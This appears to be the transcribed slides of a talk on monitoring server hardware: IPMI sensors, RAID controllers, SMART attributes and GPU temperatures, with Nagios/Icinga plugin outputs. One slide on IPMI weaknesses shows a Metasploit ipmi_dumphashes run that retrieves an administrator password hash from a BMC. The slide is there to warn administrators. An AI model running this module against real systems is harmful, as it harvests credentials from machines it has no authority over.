Server hardware is diverse, and so are the problems that can occur. Several interfaces exist for monitoring server components. They range from network protocols such as IPMI and SNMP to checks that have to be executed locally on the server itself (e.g. for RAID controllers, SMART attributes or GPU cards).
In this talk you will learn which checks are best suited to specific hardware components, so that you are informed reliably and promptly as soon as problems start to emerge.
14. Architecture
[Figure: IPMI block diagram. On the motherboard, the Baseboard Management Controller (BMC) sits on the system bus and the system interface. It is connected to sensors and controls (fan sensor, temperature sensor, power control, reset control, …) and to non-volatile storage (SDR, SEL, FRU). Private management buses and the IPMB link it to the processor board, memory board, redundant power board and chassis board (FRU and temperature sensors) and to the chassis management (satellite) controller. An ICMB bridge leads to ICMB. Further access paths: LAN interface (network controller, LAN connector), serial/modem interface (serial port sharing between motherboard and BMC serial controllers, serial connector), PCI management bus, remote management card (KVM over IP, ...) and auxiliary IPMB connector. Annotations on the slide: "access with user name & password" and "access with root privileges".]
15. IPMI Sensor Classes
Discrete (true/false)
Multiple states possible:
● up to 15 states
● each state = 1 bit
● several state bits can be active at the same time
Provides:
● generic states
● sensor-specific states
Similar class: OEM
● the meaning of the states is defined by the OEM
Threshold
State depends on:
● comparison of the analog reading with the thresholds
Provides:
● analog reading
● discrete status
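The difference between the two sensor classes can be sketched in a few lines of Python. This is an illustration only and is not taken from any of the plugins: the function names are hypothetical, the state names in PSU_STATES are borrowed from the power supply example in this deck, and their bit positions are an assumption made for the example. The fan thresholds are the values shown for "Fan 1".

```python
# Sketch only: bit positions and names are illustrative assumptions.
PSU_STATES = {
    0: "Presence detected",
    1: "Failure detected",
    2: "Predictive failure",
    3: "Power Supply AC lost",
}


def decode_discrete(mask, names):
    """Discrete sensor: return the names of all asserted state bits.

    Up to 15 states, one bit per state, several bits may be set at once.
    """
    return [
        names.get(bit, f"state bit {bit}")
        for bit in range(15)
        if mask & (1 << bit)
    ]


def classify_threshold(reading, lower_critical, lower_noncritical):
    """Threshold sensor: derive a discrete status from an analog reading."""
    if reading <= lower_critical:
        return "critical"
    if reading <= lower_noncritical:
        return "warning"
    return "ok"


if __name__ == "__main__":
    # Bits 0 and 3 set: PSU present, but AC lost.
    print(decode_discrete(0b1001, PSU_STATES))
    # Fan at 5719 RPM with lcr=1720 and lnc=1978.
    print(classify_threshold(5719, 1720, 1978))
```

A discrete sensor therefore reports a set of flags, while a threshold sensor reports a number plus the status derived from it.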
16. IPMI Sensor Classes
Discrete:
[root@test ~]# ipmitool sdr get "PS2 Status"
Sensor ID : PS2 Status (0x71)
Entity ID : 10.2 (Power Supply)
Sensor Type (Discrete): Power Supply
States Asserted : Power Supply
    [Presence detected]
    [Power Supply AC lost]
Assertion Events : Power Supply
    [Presence detected]
    [Power Supply AC lost]
Assertions Enabled : Power Supply
    [Presence detected]
    [Failure detected]
    [Predictive failure]
    [Power Supply AC lost]
    [...]
Deassertions Enabled : Power Supply
    [...]
Threshold:
[root@test ~]# ipmitool sdr get "Fan 1"
Sensor ID : Fan 1 (0x50)
Entity ID : 29.1 (Fan Device)
Sensor Type (Analog) : Fan
Sensor Reading : 5719 (+/- 0) RPM
Status : ok
Nominal Reading : 6708.000
Normal Minimum : 2451.000
Normal Maximum : 10965.000
Lower critical : 1720.000
Lower non-critical : 1978.000
Positive Hysteresis : 86.000
Negative Hysteresis : 86.000
Minimum sensor range : Unspecified
Maximum sensor range : Unspecified
Event Message Control : Per-threshold
Readable Thresholds : lcr lnc
Settable Thresholds : lcr lnc
Threshold Read Mask : lcr lnc
Assertion Events :
Assertions Enabled : lnc- lcr-
Deassertions Enabled : lnc- lcr-
17. IPMI Sensors
$ sudo ipmi-sensors --output-sensor-state --interpret-oem-data
Password:
ID | Name | Type | State | Reading | Units | Event
4 | System Temp | Temperature | Nominal | 27.00 | C | 'OK'
71 | Peripheral Temp | Temperature | Nominal | 35.00 | C | 'OK'
138 | CPU Temp | OEM Reserved | Nominal | N/A | N/A | 'Low'
205 | FAN 1 | Fan | Nominal | 1800.00 | RPM | 'OK'
…
942 | VBAT | Voltage | Nominal | 3.15 | V | 'OK'
1009 | VSB | Voltage | Nominal | 3.34 | V | 'OK'
1076 | AVCC | Voltage | Nominal | 3.38 | V | 'OK'
1143 | Chassis Intru | Physical Security | Critical | N/A | N/A | 'Gen...'
Callouts on the slide: OK, Critical
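How the State column of such a sensor listing could be turned into a monitoring result is sketched below in Python. This is not the implementation of check_ipmi_sensor: the function names, the mapping table and the rule that CRITICAL outranks UNKNOWN are assumptions for illustration. The sample rows are copied from the listing above.

```python
# Sketch: map the "State" column of a pipe-separated sensor listing to a
# Nagios exit code. Mapping and severity order are assumptions.
NAGIOS = {"Nominal": 0, "Warning": 1, "Critical": 2}  # anything else: 3 (UNKNOWN)
SEVERITY = [0, 1, 3, 2]  # OK < WARNING < UNKNOWN < CRITICAL

SAMPLE = """\
ID | Name | Type | State | Reading | Units | Event
4 | System Temp | Temperature | Nominal | 27.00 | C | 'OK'
205 | FAN 1 | Fan | Nominal | 1800.00 | RPM | 'OK'
1143 | Chassis Intru | Physical Security | Critical | N/A | N/A | 'Gen...'
"""


def parse_sensors(text):
    """Return one dict per sensor row, keyed by the header columns."""
    lines = [line for line in text.splitlines() if "|" in line]
    if not lines:
        return []
    header = [column.strip() for column in lines[0].split("|")]
    rows = []
    for line in lines[1:]:
        fields = [field.strip() for field in line.split("|")]
        rows.append(dict(zip(header, fields)))
    return rows


def overall_state(rows):
    """Return the worst Nagios exit code over all rows (3 if there are none)."""
    codes = [NAGIOS.get(row["State"], 3) for row in rows]
    if not codes:
        return 3
    return max(codes, key=SEVERITY.index)


if __name__ == "__main__":
    print(overall_state(parse_sensors(SAMPLE)))
```

With the sample rows, the chassis intrusion sensor alone decides the overall result.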
20. IPMI Plugin
#!/usr/bin/perl
# check_ipmi_sensor: Nagios/Icinga plugin to check IPMI sensors
#
# Copyright (C) 2009-2014 Thomas-Krenn.AG,
# additional contributors see changelog.txt
#
# This program is free software; you can redistribute it and/or modify it under
[…]
Version 3.5 20141031
* Fix LAN Driver if called on localhost
Version 3.4 20140929
* Fix implicit array warning with split
* Add option to disable LAN protocol version 2.0
Version 3.3 20140606
* Print a warning if ipmi-sensors only returned a single output row
* Ignore sudo errors and warnings in IPMI command output
(Thanks to Robert Heinzmann for contributing)
* Use LAN protocol version 2.0 per default
* Print empty output error only if return code was 0
* Exit the plugin with return code 3 if fru command fails
* Added an include list option to only include specific sensors
Version 3.2 20131028
* Added FRU serial number to output
29. IPMI Firmware by ATEN / AMI
_ mainboard manufacturers customize the firmware
_ OS = embedded Linux
_ parts of the IPMI firmware are closed source
30. We recommend not exposing administrative access such as IPMI, or SSH services for that matter, openly on the Internet, but using a firewall/VPN to restrict access to these services to authorized persons only.
35. #2 – User Management
[Figure: user list showing the account names sjfaiklaz and afjhuijoh with the privilege levels Administrator and User]
36. #2 – User Management
"In short, the authentication process for IPMI 2.0 mandates that the server send a salted SHA1 or MD5 hash of the requested user's password to the client, prior to the client authenticating."
Source: A Penetration Tester's Guide to IPMI and BMCs (rapid7.com)
msf > use auxiliary/scanner/ipmi/ipmi_dumphashes
msf auxiliary(ipmi_dumphashes) > set RHOSTS 10.1.102.141
RHOSTS => 10.1.102.141
msf auxiliary(ipmi_dumphashes) > set THREADS 128
THREADS => 128
msf auxiliary(ipmi_dumphashes) > run
[+] 10.1.102.141:623 - IPMI - Hash found:
admin:14667523250000004ec525d3852f4fa73c93b674788217fe00000000000000
00000000000000000000000000000000000000000000000000140561646d696e:2c7
6e372d89ac7cd4e3bfecb423962f708d0741c
55. root@debiantest:~# storcli64
Storage Command Line Tool Ver 1.13.06 Sep 03, 2014
(c)Copyright 2014, LSI Corporation, All Rights Reserved.
help - lists all the commands with their usage. E.g. storcli help
<command> help - gives details about a particular command. E.g. storcli add help
List of commands:
Commands Description
add Adds/creates a new element to controller like VD,Spare..etc
delete Deletes an element like VD,Spare
show Displays information about an element
set Set a particular value to a property
get Get a particular value to a property
compare Compares particular value to a property
start Start background operation
stop Stop background operation
pause Pause background operation
resume Resume background operation
download Downloads file to given device
expand expands size of given drive
insert inserts new drive for missing
transform downgrades the controller
/cx Controller specific commands
/ex Enclosure specific commands
/sx Slot/PD specific commands
/vx Virtual drive specific commands
/dx Disk group specific commands
/fall Foreign configuration specific commands
/px Phy specific commands
/[bbu|cv] Battery Backup Unit, Cachevault commands
56. check_lsi_raid
$ /usr/lib/nagios/plugins/check_lsi_raid -vv
Warning (LD Warn) [c0/v0_Consist = Warning (No)]|
CV_Temperature=22;70;85 ROC_Temperature=57;80;90
c0/e252/s0_Drive_Temperature=21;40;45
c0/e252/s1_Drive_Temperature=21;40;45
Used storcli commands:
/usr/bin/sudo /usr/sbin/storcli64 /c0 /cv show status
/usr/bin/sudo /usr/sbin/storcli64 adpallinfo a0
/usr/bin/sudo /usr/sbin/storcli64 /c0/vall show all
/usr/bin/sudo /usr/sbin/storcli64 /c0/vall show init
/usr/bin/sudo /usr/sbin/storcli64 /c0/eall/sall show all
/usr/bin/sudo /usr/sbin/storcli64 /c0/eall/sall show initialization
/usr/bin/sudo /usr/sbin/storcli64 /c0/eall/sall show rebuild
Warning sensors:
c0/v0_Consist (No)
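The part of the plugin output after the "|" is Nagios performance data in the form label=value;warn;crit. A minimal Python sketch of how such a string can be read back is shown here. The function names are hypothetical, and the parser assumes values without a unit suffix and labels without spaces, which holds for the sample copied from the output above.

```python
# Sketch: parse Nagios performance data tokens of the form
# label=value;warn;crit (no unit suffix, no spaces in labels assumed).
SAMPLE = (
    "CV_Temperature=22;70;85 ROC_Temperature=57;80;90 "
    "c0/e252/s0_Drive_Temperature=21;40;45 "
    "c0/e252/s1_Drive_Temperature=21;40;45"
)


def parse_perfdata(perfdata):
    """Return {label: (value, warn, crit)}; missing thresholds become None."""
    result = {}
    for token in perfdata.split():
        label, _, rest = token.partition("=")
        parts = rest.split(";")
        value = float(parts[0])
        warn = float(parts[1]) if len(parts) > 1 and parts[1] else None
        crit = float(parts[2]) if len(parts) > 2 and parts[2] else None
        result[label] = (value, warn, crit)
    return result


def above_warning(perf):
    """Return the labels whose value lies above the warning threshold."""
    return [
        label
        for label, (value, warn, _crit) in perf.items()
        if warn is not None and value > warn
    ]


if __name__ == "__main__":
    perf = parse_perfdata(SAMPLE)
    print(perf["ROC_Temperature"])
    print(above_warning(perf))
```

In the sample all four temperatures are below their warning thresholds, so the Warning state of the check comes from the consistency sensor and not from the performance data.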
57. Why adpallinfo a0?
"storcli /0 show all … blocks the whole raid card i/o for … upto ~4 seconds"
59. check_lsi_raid
$ /usr/lib/nagios/plugins/check_lsi_raid -h
check_lsi_raid: Nagios/Icinga plugin to check LSI Raid Controller status
Plugin version: 2.0
Copyright (C) 2013-2014 Thomas-Krenn.AG
Current updates available at http://git.thomas-krenn.com/check_lsi_raid.git
This Nagios/Icinga Plugin checks LSI RAID controllers for controller,
physical device, logical device, BBU and CV warnings and errors.
In order for this plugin to work properly you need to add the nagios
user to your sudoers file (or create a new one in /etc/sudoers.d/).
Usage:
[ -h | --help ]
Display this help page
[ -v | -vv | -vvv | --verbose ]
Sets the verbosity level.
No -v is the normal single line output for Nagios/Icinga, -v is a
more detailed version but still usable in Nagios. -vv is a
multiline output for debugging configuration errors or more
detailed information. -vvv is for plugin problem diagnosis.
For further information please visit:
http://nagiosplug.sourceforge.net/developer-guidelines.html#AEN39
[ -V | --version ]
Displays the plugin and, if available, the version of StorCLI.
[ -C <num> | --controller <num> ]
Specifies a controller number, defaults to 0.
...
64. $ sudo arcconf
| UCLI | Adaptec by PMC uniform command line interface
| UCLI | Version 1.6 (B21062)
| UCLI | (C) Adaptec by PMC 2003-2014
| UCLI | All Rights Reserved
ATAPASSWORD | setting password on a physical drive
COPYBACK | toggles controller copy back mode
CREATE | creates a logical device
CONSISTENCYCHECK | toggles the controller background consistency check mode
DELETE | deletes one or more logical devices
ERRORTUNABLE | sets error tunable profiles on the controller
EXPANDERLIST | Lists the Expanders Connected to the Controller
EXPANDERUPGRADE | updates expander firmware
FAILOVER | toggles the controller automatic failover mode
GETCONFIG | prints controller information
GETLOGS | gets controller log information
GETPERFORM | gets the parameters for a performance mode
GETSMARTSTATS | gets the SMART statistics
GETSTATUS | displays the status of running tasks
GETVERSION | prints version information for all controllers
IDENTIFY | blinks LEDS on device(s) connected to a controller
IMAGEUPDATE | update physical device firmware
KEY | installs a Feature Key onto a controller
MODIFY | performs RAID Level Migration or Online Capacity Expansion
PHYERRORLOG | displays PHY error logs for controller or device or an
| expander PHY
PRESERVECACHE | changes the cache preservation settings on the controller
RESCAN | checks for new or removed drives
RESETSTATISTICSCOUNTERS | resets the controller statistics counters
ROMUPDATE | updates controller firmware
SAVESUPPORTARCHIVE | saves the support archive
SETALARM | controls the controller alarm, if present
...
65. check_adaptec_raid: update planned (2015)
$ ./check_adaptec_raid -p /usr/sbin/arcconf
AACRAID CRITICAL (Ctrl #1): [ZMM critical]
$ ./check_adaptec_raid -h
Thomas-Krenn Adaptec Raid Controller Nagios/Icinga Plugin Version: 1.0
Copyright (C) 2009-2013 Thomas-Krenn.AG
Current updates available via git at:
http://git.thomas-krenn.com/check_adaptec_raid.git
This Nagios/Icinga Plugin checks ADAPTEC RAID-Controllers for Controller,
Physical-Device and Logical Device warnings and errors.
In order for this plugin to work properly you need to add the
nagios-user to your sudoers file (or create a new one in /etc/sudoers.d/).
This is required as arcconf must be called with sudo permissions.
Usage:
[ -C <Controller number> ] [ -LD <Logical device number> ]
[ -PD <Physical device number> ] [ -T <Warning Temp., Crit. Temp.> ]
[ -h | --help ]
Display this help page
[ -v | -vv | -vvv | --verbose ]
Sets the verbosity level
no -v single line output for Nagios/Icinga
-v single line with more details
...
66. VMware? → CIM provider expected
_ currently:
_ "CIM provider" for remote arcconf
_ Adaptec MSM in a VM
_ in the future:
_ "real" CIM provider
76. Cool, but what about RAID controllers?
...
[-d|--device <path to device being checked>]
Specify the device being monitored. If multiple devices should be
checked provide the '-d' option multiple times.
E.g. '-d /dev/sda -d /dev/sdb'
For devices behind LSI RAID controllers specify 'megaraid' and then the
device number, e.g. '-d megaraid6'. Use storcli to find out the
corresponding device numbers.
For devices behind Adaptec RAID controllers specify '/dev/sg<X>' where
<X> is the number for your device. Use e.g. sg_scan to find the device.
You must also use '-O sat' or '-O scsi' according to the device
interface. These are extra options only necessary for '/dev/sg<X>'
devices.
...
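The three kinds of device specification described in the help text can be related to smartctl device types with a small Python sketch. The slides do not show how check_smart_attributes does this internally, so the function below is a hypothetical illustration: it relies on smartctl's "-d megaraid,N", "-d sat" and "-d scsi" device types, and the megaraid_host parameter (a block device that exposes the LSI controller) is an assumption.

```python
import re


def smartctl_args(device, interface=None, megaraid_host="/dev/sda"):
    """Build a smartctl argument list for one device specification.

    device        'megaraid<N>', '/dev/sg<X>' or a plain block device
    interface     'sat' or 'scsi', required for '/dev/sg<X>' devices
    megaraid_host assumed block device used to reach the LSI controller
    """
    match = re.fullmatch(r"megaraid(\d+)", device)
    if match:
        # Drive behind an LSI controller, addressed by its device number.
        return ["smartctl", "-A", "-d", f"megaraid,{match.group(1)}", megaraid_host]
    if device.startswith("/dev/sg"):
        # Drive behind an Adaptec controller, addressed as SCSI generic device.
        if interface not in ("sat", "scsi"):
            raise ValueError("'/dev/sg<X>' devices need interface 'sat' or 'scsi'")
        return ["smartctl", "-A", "-d", interface, device]
    # Directly attached drive.
    return ["smartctl", "-A", device]


if __name__ == "__main__":
    print(smartctl_args("megaraid6"))
    print(smartctl_args("/dev/sg2", interface="sat"))
    print(smartctl_args("/dev/sda"))
```

The sketch only builds the argument list; running smartctl itself needs root privileges or a matching sudoers entry.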
77. Cool, but what about RAID controllers?
$ /usr/lib/nagios/plugins/check_smart_attributes -d megaraid6 -dbj /etc/nagios-plugins/config/check_smartdb.json
OK (megaraid6) |
megaraid6_Temperature_Internal=26
megaraid6_Media_Wearout_Indicator=100;16;6
megaraid6_Host_Writes_32MiB=70283
megaraid6_Host_Reads_32MiB=1650800
$ /usr/lib/nagios/plugins/check_smart_attributes -d megaraid7 -dbj /etc/nagios-plugins/config/check_smartdb.json
Warning (megaraid7) [megaraid7_CRC_Error_Count = Warning]|
megaraid7_Temperature_Internal=34
megaraid7_Media_Wearout_Indicator=098;16;6
megaraid7_Host_Writes_32MiB=189904
megaraid7_Host_Reads_32MiB=29658
80. NVIDIA: "the displayed fan speed does not indicate whether the fan is actually spinning."
"It is the speed at which the fan algorithm is trying to run the fan."
We recommend: "temperature sensor"
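A temperature-based GPU check along these lines could look like the following Python sketch. It is not one of the plugins from this talk: the function names are hypothetical and the warn/crit defaults of 80 and 90 degrees Celsius are placeholder assumptions that need to be adapted to the actual card. The query uses nvidia-smi with --query-gpu=temperature.gpu and --format=csv,noheader,nounits, which prints one temperature per GPU.

```python
import subprocess


def parse_temps(output):
    """Turn nvidia-smi output (one integer per line) into a list of ints."""
    return [int(line) for line in output.splitlines() if line.strip()]


def read_gpu_temps():
    """Query the temperature of every GPU in degrees Celsius via nvidia-smi."""
    completed = subprocess.run(
        ["nvidia-smi", "--query-gpu=temperature.gpu",
         "--format=csv,noheader,nounits"],
        capture_output=True, text=True, check=True,
    )
    return parse_temps(completed.stdout)


def gpu_state(temps, warn=80, crit=90):
    """Return a Nagios exit code; warn and crit are hypothetical defaults."""
    if not temps:
        return 3  # UNKNOWN: no GPU reported a temperature
    hottest = max(temps)
    if hottest >= crit:
        return 2
    if hottest >= warn:
        return 1
    return 0
```

On a host with the NVIDIA driver installed, gpu_state(read_gpu_temps()) yields the exit code for the hottest GPU. The fan speed is deliberately not evaluated, for the reason NVIDIA gives above.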
81. Plugins - Future
_ monitoring of firmware versions
_ RAID consistency checks
_ temperature of 10 Gbit NICs (see Intel X540 FAQs)
83. Relax ...
_ all plugins are available at git.thomas-krenn.com
_ all plugins comply with the Plugin Developer Guidelines (-h for help)
_ "Plugin Entwicklung für Einsteiger" (plugin development for beginners) by Alexander Wirt, today at 14:15